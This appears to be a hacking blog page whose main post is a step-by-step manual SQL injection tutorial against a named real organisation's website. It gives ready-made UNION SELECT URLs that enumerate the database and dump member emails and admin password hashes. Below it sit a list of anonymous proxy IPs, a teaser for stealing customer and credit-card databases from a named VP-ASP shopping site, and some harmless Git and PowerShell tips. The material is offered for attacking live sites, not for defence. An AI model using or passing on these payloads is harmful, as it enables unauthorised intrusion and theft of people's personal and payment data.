How to hack websites using Manual SQL injection

Hello Friends, Today we are going to learn how to hack a website using Manual SQL injection.
The website which we will be using in this demo is : www.unitedpurpose.org/

So, here is the Vulnerable link : www.unitedpurpose.org/archive/article.php?id='100

So lets begin :

Step 1: First we have to find the number of columns present in the database. So to do that we have to implement the "order by" command in the vulnerable site. Example:

http://www.unitedpurpose.org/archive/article.php?id=100 order by 7 (any no. u have to guess it, i m using 13 )

*Remember if u get error in "order by 7" that means site has less than 7 columns,if we get the same page then the no. of columns is more than 7.. In my case the number of columns are 13.

Step 2 : After getting the columns, its time to get the vulnerable column by using "UNION SELECT" no. of all columns 1 after another separated by commas(,). See the example for more clarification :

Example : http://www.unitedpurpose.org/archive/article.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3 : In my case I got 4 and 7 as vulnerable column.(We will try with column 4). We can inject our queries in column 4 for version we can add @@version, for db database()

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4 : Now we hav got the version as well as database name, now its time to search for the table. For that we will replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time for getting the columns from the User tables,we need the mysql char for this. we will replace the table_name with column_name and from information_schema.tables where table_name=mysqlchar. Just search for user and pass. Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6 : Final step to get the username and password from the column email and pass. we will remove everything from the information_schema and will add the (user,0x3a,newpass) from user's tables. Example. Just replace email and phone with ur admin and password. U will get the password in MD5 has just decrypt it.

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--

# Any problem in understanding or execution do comment below.

Comments

Fast Proxy List with their Ports

TESTED : 115.248.206.187 Port 8080 INDIA 65.49.73.192 Port 8080 USA 50.22.206.179 Port 8080 USA 149.6.5.2 Port 8080 USA 72.64.146.136 Port 8080 USA 64.37.63.106 Port 8080 USA 118.91.234.81 Port 8080 INDIA 125.16.69.114 Port 8080 INDIA 115.252.111.214 Port 8080 INDIA 114.143.12.28 Port 8080 INDIA 27.124.48.34 Port 8080 INDIA ANONYMOUS US PROXY SERVER : 12.235.183.190:443 12.68.37.35:8080 128.2.211.115:3127 129.105.15.38:3124 130.245.191.59:3124 130.245.191.59:3128 130.245.191.60:3128 131.247.2.247:3127 131.247.2.247:3128 146.57.249.98:3128 166.122.68.249:8080 170.140.119.69:3127 173.14.5.140:80 173.15.162.73:80 173.19.200.137:8080 173.203.109.119:80 173.203.206.233:80 173.203.215.116:80 174.51.152.145:29005 184.106.129.168:8081 184.106.228.14:80 184.72.36.101:80 184.73.34.31:80 199.26.254.66:3128 199.3.183.160:80 199.3.183.160:

How to hack VP-ASP Shopping websites and get all the Database details

Hello Friends, Today we are going to learn how to hack VP-ASP cart of a Shopping website and download all their Database details like Customer details, Credit card details, Product details etc. So some basic idea before starting the Tutorial, What we are going to do here? Firstly we will hack a shopadmin website then we will download the database file which will be in the form of *.mdb. This database file contains all the client details like credit card information and also login name and passwords. How to do this ? Note : This tutorial is tested on "VP-ASP Shopping Cart Version:5.00" Step 1 : First thing to do is to find VP-ASP 5.00 Sites, to do this -> Go to Google.com -> Type "VP-ASP Shopping Cart 5.00"[ Without Quotes ] . See the image for reference Step 2 : In this tutorial, we are going to target www.surfstats.com You can also select your website which is having "shopdisplaycategories.asp","sho

Windows Services Startup Type Explained

Hi Geeks, Today I was working on a Service related script so thought of sharing some useful information related to Services Startup Type which most of the people knows but doesn’t know about the functionality. So lets begin. What are Windows Services and what they do ? Windows Services are the components or applications that starts when your computer is booted up and runs in the background mode helping the application to work smoothly and finally stops when the computer shuts down. For Example, If you want to send or receive any Fax, then the Fax service should be running in the background to perform the Fax activity. How many Service Startup Types are there and what they do ? There are 4 Service Startup Types available : 1. Automatic Explanation : Automatic Service Startup Type starts the service automatically when the system boot up is done. So if we are having a machine of less memory and there are lots of services in Automatic Startup type then your mac

How to see remote changes before doing Git Pull

Before going through the steps, lets first understand what is the purpose of GIT Pull ? In simple terms, GIT PULL is a GIT Command which access the Remote repository and checks which all files were modified or created and is different from the local repository. Once it finds that info, it downloads those file to your local repository. Technically speaking, GIT Pull runs 2 commands i.e GIT Fetch and GIT Merge in background. GIT Fetch downloads the latest change to the local repository while GIT Merge merges the remote content refs and heads to new local merge commit. so you can say the below is same : GIT Pull <remote> -or- GIT Fetch <remote> GIT Merge origin/master So lets begin with the steps on how to see the remote (origin/master) changes before doing Git Pull : Git fetch origin Git log master..origin/master Git diff master..origin/master Git pull / Git merge origin/master Happy Leaning! How to get started with GIT in Windows : Check out here

Powershell Tip : How to find the IP Address of a VM from a HyperV

Today we are going to see how to fetch the IPv4 Address details of a VM from a HyperVisor console. We will be using Powershell to achieve the same with a One-Liner code. You can modify the Command as per your need. Our requirement is to check Only the Running VM's and get the VM Name and its corresponding IPv4 Address. So lets get started. CODE (Execute in HyperV ): Get-VM | ? State -eq "Running" | select Name, @{l="IPv4Address";e={($_.NetworkAdapters.IPAddresses -match "(?<Address >((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))")} } CODE DETAILS : 1. Get-VM : Fetches the VM List present on the HyperVisor 2. ? State -EQ "Running" : It is similar to Where-Object {$_.State -eq "Running"} , here we are using where-object to fetch only the Running VM list from the Pipeline. 3. NetworkAdapters properties of the VM Contains the IPAddresses information, we are using IPv4 address Regex to get

Powershell Tip : How to find the disk type of your System ( HDD or SSD )

Hi Friends😀 Today we are going to learn how to find the disk type of your system i.e. whether it is SSD ( Solid State Drive ) or HDD ( Hard Disk Drive ). Powershell has a cmdlet which helps to achieve the same : Get-PhysicalDisk Get-PhysicalDisk | Select FriendlyName , MediaType , Size

Amar Helloween

Search This Blog